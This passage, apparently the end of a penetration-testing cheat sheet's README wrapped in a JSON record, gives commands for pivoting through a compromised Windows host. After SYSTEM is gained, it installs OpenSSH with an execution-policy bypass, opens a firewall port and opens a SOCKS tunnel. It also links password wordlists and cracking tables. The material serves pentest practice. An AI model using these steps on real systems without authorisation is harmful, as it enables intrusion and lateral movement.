apache2\n```\n\n- client\n\nGet via web browser, wget or powershell...\n\n### Windows Pivoting\n\n#### Openssh for Tunneling\n\nOnce you got SYSTEM on the target machine. download: [openssh_for_windows](https://github.com/PowerShell/Win32-OpenSSH/releases)\n\n```powershell\npowershell -command \"Expand-Archive 'C:\\\u003cpath-to-zipped-openssh\u003e\\openssh.zip' c:\\\u003cpath-to-where-you-whereever-you-want\\\"\n```\n\nThen install it:\n\n```powershell\npowershell -ExecutionPolicy Bypass -File c:\\\u003cpath-to-unzipped-openssh-folder\u003e\\install-sshd.ps1\n```\n\nNow if you need, just adjust the firewall rules to your needs:\n\n```powershell\npowershell -Command \"New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22\"\n```\n\nStart the sshd service:\n\n```powershell\nnet start sshd\n```\n\nAfter these steps a regular ssh tunnel would sufice:\n\nFrom your linux machine:\n\n```bash\n$ ssh -ACv -D \u003ctunnel_port\u003e \u003cwindows-user\u003e@\u003cwindows-ip\u003e\n```\n\ndone you have now a socks to tunnel through!!\n\n##\n\n# Resources\n\n##\n\n#### HTTP/HTTPS Servers\n\nHTTPS using Python\n\nCreate the Certificate:\n\n```\nopenssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes\n```\n\nStart the HTTPS Server\n\n```\nimport BaseHTTPServer, SimpleHTTPServer\nimport ssl\n\nhttpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)\nhttpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)\nhttpd.serve_forever()\n```\n\n## Wordlists\n\n- Wordlists\n  - [PacketStorm](https://packetstormsecurity.com/Crackers/wordlists/dictionaries/)\n  - [SecList](https://github.com/danielmiessler/SecLists)\n  - [cotse](http://www.cotse.com/tools/wordlists1.htm)\n- Default Password\n  - [DefaultPassword](http://www.defaultpassword.com/)\n  - [RouterPassword](http://www.routerpasswords.com/)\n- Leak\n  - [Pastebin](https://pastebin.com)\n- Tables\n  - [RainbowCrack](https://project-rainbowcrack.com/table.htm)\n\n##\n\n## Contribution\n\n[HOW TO](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/contribution.md)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkitsun3sec%2Fpentest-cheat-sheets","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkitsun3sec%2Fpentest-cheat-sheets","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkitsun3sec%2Fpentest-cheat-sheets/lists"}